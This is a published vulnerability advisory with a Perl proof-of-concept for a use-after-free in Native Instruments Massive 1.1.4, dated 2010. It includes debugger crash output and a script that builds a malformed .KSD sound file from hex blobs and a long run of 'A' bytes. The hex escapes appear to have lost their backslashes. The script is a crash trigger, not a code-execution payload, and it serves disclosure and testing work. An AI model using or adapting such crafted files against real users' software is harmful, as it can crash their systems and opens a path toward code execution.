# Title : Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability
# Published : 2010-11-20
# Author : LiquidWorm
#!/usr/bin/perl
#
#
# Title: Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.1.4 (R1901)
#
# Summary: MASSIVE is a sonic monster — the ultimate synth for basses and leads. The
# analog concept belies the contemporary, cutting-edge sound it generates. The high-end
# engine delivers pure quality, lending an undeniable virtue and character to even the
# most saturated of sounds. The interface is clearly laid out and easy to use, ensuring
# you will have MASSIVE generating earth-shuddering sounds from the very first note.
#
# Desc: Massive suffers from a use-after-free error when parsing sound files (.KSD),
# resulting in a crash. The debugger output below shows a freed heap block being
# modified after it was freed, followed by an access violation in ntdll!RtlFillMemoryUlong.
# The file contents are not properly validated, which may give an attacker the
# possibility of arbitrary code execution on the affected system; note that only the
# crash is demonstrated here, not code execution. Failed exploitation results in a
# denial of service.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#-------------------------------------------------------------------------------------#
#
# Heap corruption detected at 06B7F6E8
# HEAP[Massive.exe]: HEAP: Free Heap block 6b7f6e0 modified at 6b7f6f0 after it was freed
# (960.dc8): Break instruction exception - code 80000003 (first chance)
# eax=06b7f6e0 ebx=00000000 ecx=7c91e544 edx=098fee78 esi=06b7f6e0 edi=0007a7b0
# eip=7c90120e esp=098ff078 ebp=098ff07c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:010> g
# (960.dc8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=feeefeee ebx=0000f4e1 ecx=000063a8 edx=098fee78 esi=06b7f6e0 edi=06be1000
# eip=7c902c53 esp=098ff074 ebp=098ff2a4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# ntdll!RtlFillMemoryUlong+0x10:
# 7c902c53 f3ab rep stos dword ptr es:[edi]
# 0:010> g
# (960.dc8): C++ EH exception - code e06d7363 (first chance)
# Heap corruption detected at 06B80FA8
# Heap corruption detected at 06B80F18
# HEAP[Massive.exe]: HEAP: Free Heap block 6b80f10 modified at 6b80f20 after it was freed
# (960.ee8): Break instruction exception - code 80000003 (first chance)
# eax=06b80f10 ebx=04180000 ecx=7c91e544 edx=0012e8a4 esi=06b80f10 edi=06b80fa0
# eip=7c90120e esp=0012eaa4 ebp=0012eaa8 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
#
#-------------------------------------------------------------------------------------#
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail
# Zero Science Lab
# http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2010-4980
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4980.php
#
# 04.11.2010
#
use strict;
use warnings;
my $file = "massive_sound.ksd";
my $head = "x2Dx69x6Ex2Dx02x00x00x00x23x4Ex49x23x43x53x23x44x6Fx63x75x6Dx65".
"x6Ex74x23x23x4Ex49x23x53x6Fx75x6Ex64x53x68x65x6Cx6Cx23x53x6Fx75".
"x6Ex64x23x00x00x00x00x00x00x00x00x00x00x00x31x01x00x00x61x74x61".
"x64x02x00x00x00x64x6Ex73x73x62x69x6Cx7Ax16x00x00x00x10x00x00x00".
"x78xDAx63x62x60x60xD0xF5xF4xD3x4DxF4xCDxF4x03x32x19x00x13x2Fx02".
"x59x61x74x61x64x02x00x00x00x6Fx66x6Ex69x62x69x6Cx7AxC0x02x00x00".
"xCBx05x00x00x78xDAx75x54xC9x6ExDBx30x10x75x0FxBDxF8x2Bx08xDEx6B".
"xB9x29x0AxF4x20x29x90xB7xC4xA8xEDx04x91xD3xF6x16x30xD2x44x22x4A".
"x91x06x49x39xD5xD7xF5xD7x3Ax94x4Cx59x0Ex9Ax13x67x9Fx37x0Bx87x6C".
"xB6xBFx3Ex8Cx46xA3xBFx1Fx47xA3xF0xFAx4Fx25xC8x11xB4xE1x4Ax46xF4".
"xF3x64x4Ax09xC8x4CxE5x5Cx16x11x7DxDCxAFx3Ex7DxA3xC4x58x26x73x26".
"x94x84x88x4Ax45xC9x75x3Cx0Ex77xEBxA7xC5xDDxFCxE9x76x99x2Cx96x0F".
"x24x57xD9xD3x41x30xFBxA2x74x15x51x8CxE1x04x7DxD4x2FxD3xAFx9DxE4".
"x55x73x0Bx07xADx2Cx64x16x72x67x18x8FxC7x84x84x4Ex27x59x05xB1x05".
"x63xC3xA0x67x7BxA5x6Dx0Ex10x67xAAx9Ax48x66xF9x11x3Ex71x69xACxAE".
"x2Bx90xD6x4Cx52x55xCBx3Cx2Dx41x88x89x71x64xE7xDFx7AxF4xFEx19xB3".
"x50x28xDDxC4xC8xB4x6Ex9Dx51x2Fx6Ex0DxB9x7Cx51x31x12x48x62xAAx4A".
"xC9xC4x5AxDDx09x50xB4xE0x06x2Bx6Cx76x0Ex57x18x0Cx39x6Fx91xD4xB6".
"x54x1Ax95x27xC2xCBx7Fx80xCCx91xDDxB5xD0xC9xFAx0Cx3Dx0Cx4Ex2Ax6F".
"x39x63xF2x77x5BxF8x96x19xE3x8Cx57x2CxB3x88x8FxCCx95xB4x2DxEAxDE".
"xC2xBBxCCx11x29x6Ax30xABxA7xBCx66x9Dx29x89xE2xF6xF1xB2x7BxADx0E".
"xE4x01x81xB8xE9x4Ex69x30x08x23x94x26x49x44x7Fx96x38x22xAFx08x83".
"xB7x8Dx08xF7x90x95x92x67x4Cx5Cx36x07x8Ex3Cx83x3DxF6xDCxC5x38x97".
"x38xC8xF0x1Dx9Ax0Dx6Bx54x6DxCFxA2x3Ex96x83x05xDAx72x30x64x7ExFF".
"xF8x68x58x01xEDx16x6Dx14xCBxF7xBCxEAx98x2Dx54x67xCDxAExAExD6xF2".
"x50x5BxE3xB9xBBxDAx76xECxD5x20xE7xBDxA8x0Bx5Cx15xCFxF7x12xDFxDF".
"x30x38xF1xDEx21xB8xF0x08x83xFFx54x1Bx6Ex6BxE3x25x64x0FxD5x41xE1".
"xB7xB9x9AxBAx55xF6x8DxEFxCBx77xCDxD8x32x21xC0x0ExC7x3Ex00xE8x3B".
"x96xE4x39x77xDBx41xC9x2CxA2x0Bx5Ex70xCBx04x25xF3x88x62x67x32x30".
"x06x72x4Ax16x11x4Dx1Bx69x4BxB0x3Cx1Bx86xE0xD5xB3x6Ex83xCCx34x2F".
"x4AxDBx86xC0x71xE6xADx3FxEExA9x51x92xE1x24x9CxFFx2Dx1Ax50xB2x44".
"x50x80x09x04xC6x21xABx88xEEx14x37x0Dx25x37x18x5FxBDxA0xE1x6Dx44".
"xF7x25x97x83x1Cx09xCEx26xABxF1x7FxE3x77x76x99x16x90xB1x06x77xA8".
"xCDxB5xCCx4AxD5xD2x98x6Ex03xACx43xBAx51xB2x20x0Fx20x80x19x68x33".
"xA6xAFx00x87x60xC5x85x05x4DxB6x2Ax1Fx44xBFx01xD9x15x90x54xCFx1C".
"x1Bx14x2Cx05xDEx07xADx5CxE3xDBx0CxC9x11x0Bx28x98xCExE1xB2x6Ex48".
"x79x81x07xA1xD6x70xB1x66x83xADxC6x6Fx98x9FxD9x14xC7x36x30xDDxD7".
"x12x71xF7xABx3Ex98xABx13x85x41x77x0FxDEx5Cx06x86x6AxFEx5CxDBxF3".
"x0Fx3Cx32x51x43x3CxC3xFBx13x06x1Dx7Dx0AxF8xC6xF4x5DxD7xB4xBBx5A".
"xEFxFBxF6x50xC2xE0xE2xECxC6xE3x7Fx0ExC6xBCx49x61x74x61x64x02x00".
"x00x00x74x73x72x70x62x69x6Cx7AxC5x03x00x00xF2x16x00x00x78xDAxED".
"x58x49x4Fx14x41x14xAEx9Ex61x11x0Cx08x2AxA2x88x38x2Ax2AxE0x0Ax26".
"x84x20x54xF7xA0x02x46x41x20xC1x10xF7x61x18x1Cx64x10x84x11x11xB7".
"x71x19x4Cx5Cx12x8FxE2x2Fx30xE8x0FxF0x46x87x93x07x0Fx1Ex8Dx7AxF1".
"xE2x41x2Ex9AxA8xF1x24xF6x52x3Dx5Dx55xD3xFDxA8x0Ex31xF1x60x85xA2".
"xDExD4xF7xBDx57xDFxBCx7Ax35xBDx14x23xBDx25x64xC4x34xEAxB3xDAxA2".
"xD9x6FxB1x39x97x9Ax97x49x47x8BxCFx29xD8xB6xC3xD8xE6xF1x6Bx52x6B".
"x27x92x86x4FxFBxA3x42x17x0ExB3x9ExC9x51xA3x32x1BxFBx9Bx16x23x9B".
"xF8xFBxB5x71x52xFExD5x5FxAFx8Dx51xDCxFEx3Ex64x74xA4xB4x01x3Ax44".
"x9AxBBxEFx50xEDxFAx25xC4x75x88xADx36xC8xF6x1Ex00xB9x03xF1xF2xF4".
"xF9xC4x4Fx73x7Fx12x0Fx31xB5x2ExDFx91xA4xF5x0Cx49x42xC5xC4xF6xE9".
"x4CxD2x33x89x23x36xBBxE5xA4x90x9Ex90x25xE2xD4x40x46xAFxB6xA7xC5".
"x5CxC8xA9x92x41x26xD1x6Cx7Fx2F";
my $ound = "x41" x (6 * 10000 + (120000 / 30) + (2 * 100) + 50 + (2-1));
my $feet = "x32xFDx1DxDCx3ExFBxA8x7Dx90xCCx5DxD6x63x48x52x6Ax66x99xD6x8Fx8D".
"x85xABx03xC7x87x63xB9x96xDDx31x10x0Fx47x75xA4x79x20x16x8Fx8Cx06".
"xAAx29xBBx26x4BxB7x7Bx02x6Dx03x13xC6x6Cx24xD2xD7x1Bx0Ax0FxEAxB3".
"xC1x78x5CxB3xB2x35xABx2Bx12x8Bx84xC6x22x7ExB2x74x77x77x65xD0x94".
"xA2xE0xFCx94xA0x05xADx99x02x90x9Fx2Ax30xD3x4ExCCxA6x66x66x4DxA2".
"xEDx92xE3xE6xC2x13x6Dx2Bx97x77xF1x91x31x8Fx93xB3x1Cx91xDCx97x52".
"x0ExB6xFExF4xC8x79xCEx62xD2x89xB6x95xEFxDDx65x85xB3xFEx74x62x01".
"xB2x6Bx47x48xFFx4AxEFx62x56x79x77x59x2DxAAxBFx88xD6x2Fx31xDFx43".
"xD1x6Ax37x10x24x7Bx2Dx1Bx44x34xD2xF8x00xAFx31xACxBExFExCFxD8xC8".
"x92xB4x89xFFxEAx8BxCBxDBx2Cx2Ax6Fx0Bx22x67xC6x5Dx52xD7xABx32x99".
"x77x2BxA7xE3x3Fx9BxCExE1x5CxCAx92x83x72x01x57x88x5Bx45x25x6DxD3".
"xCDx0Cx6ExC7x21x87x0Ax51x62xA5x91x4Ex2FxA1xABx44x89x3Bx8CxD0x0B".
"x40xE3x6BxF7xF1xDCx11x5CxC4xE5xA8x94x2Ex12xCBx51x54xC2x06x96xA8".
"xBAx12xCBx44x23x6Ex14x25x06x9Cx88xAFxDFx1CxC5x66xAExBFx57x7CxC4".
"xC6xB1x44x25xD6x25x84x27xABx3Fx9Ex93xBAxB7xA3xAExB5xA3xAAx5Ax5D".
"xAAx8Ax8Fx29x32x9Bx58x8CxF8xCBx02xF5x9BxABxB8x89xBEx27x4Ax4Cx5A".
"xC4xF9xCEx29x45xEDx79xE9x4Ax9Cx12x8Dx78x5Fx34xB1xDBxA9x88xFAx15".
"x75xD6x8Dx58xEBx76x3DxF0x93x9Cx24xCCx33x2CxFDxD6xFFxA7x6Bx1CxC7".
"x99x5Cx52xEBx3Cx45x44xDCxA1x7Ax31x33xD3x68x8Dx12x13xF7x36x1FxD7".
"x1Ax59xDAx1Dx3Ex97x2Cx7Cx97x2Dx24x65x0ExA1x27x4Dx2CxE5x16xABxA7".
"x0AxB3x70x22xEDx47x80xC5x6FxBAxDEx67xFAx3CxCCx4BxD4x81xFExDFxB8".
"x5Cx49x1ExFFx88x9FxEFx1FxD2xE3x07x6BxE8x04x5Cx62x67x60xB8x17x86".
"xFBx61xF8x82x05xC7xE4xCCxA6x8Ex92x0Fx73x2Cx7Cx11xF6x1Ex85xE1x71".
"x18x9Ex84x8Fx00x9CxB4x93x70xECxB3x30x1Cx86xE1xF3x30x3Cx08x27x6D".
"x18xF6x1Ex83xE1x2Bx30x7Cx6Dx29x49x3Bx05xC7x3Ex07xC3x7Dx30x1Cx85".
"xE1x18x9CxB4x11xD8x3Bx0ExC3x13x30x7Cx7Dx29x49x3BxEDx14xBBxF5x53".
"xBDx6Cx3Cx10xA0x10xBCx74x04x86x07x60x78x08x4ExDAx25xD8xFBx32x0C".
"x5Fx75x82xBFx74xD6xC9xC6x63x0BxBAxE1x9Cx34xEBx0Dx4Cx06x18x1BxF3".
"xB7x24x2CxDCx04x2Bx6BxB6x00xEAx01xF0x9Dx76xF1x2Ex38xC0xF2xEAx4D".
"x6Dx92xF5xD0x0Fx6Bx92x61x4Dx07x60x4Dx2Dx82x9AxF6x93x7Cx89x69x52".
"x60x4Dx07x61x4DxADx82x9Ax1Ax3Cx69x0AxC2x9Ax0ExC1x9Ax0Ex0Bx6Ax6A".
"xE4x34xF9xA8xB7x8Fx5Ex6Dx7Dx95x2Cx87x1BxD1xD2xE4x3Cx2ExE4xEEx58".
"x77x8AxDEx55xEFx12x25xEEx16x25xEEx61xDEx50x49xDCx43x0Ex1FxE1xE9".
"xF4x3Ax99x17xBFx57x74xA9x6Ax51x62x8Dx28x71x9FxA3x78x93xFDx55x3B".
"xCFx7Fx00x0Fx27x6Fx13x61x74x61x64x02x00x00x00x67x70x74x63x62x69".
"x6Cx7Ax0Cx00x00x00x04x00x00x00x78xDAx8Bx0CxF1x75x05x00x03x43x01".
"x40x61x74x61x64x02x00x00x00x44x4Ex53x53x62x69x6Cx7Ax16x00x00x00".
"x10x00x00x00x78xDAx63x62x60x60xD0xF5xF4xD3x4DxF4xCDxF4x03x32x19".
"x00x13x2Fx02x59";
print "nn[*] Creating $file file...n";
open KSD, ">./$file" || die "nCan't open $file: $!";
print KSD $head.$ound.$feet;
print "n[.] File successfully buffered!nn";
close KSD;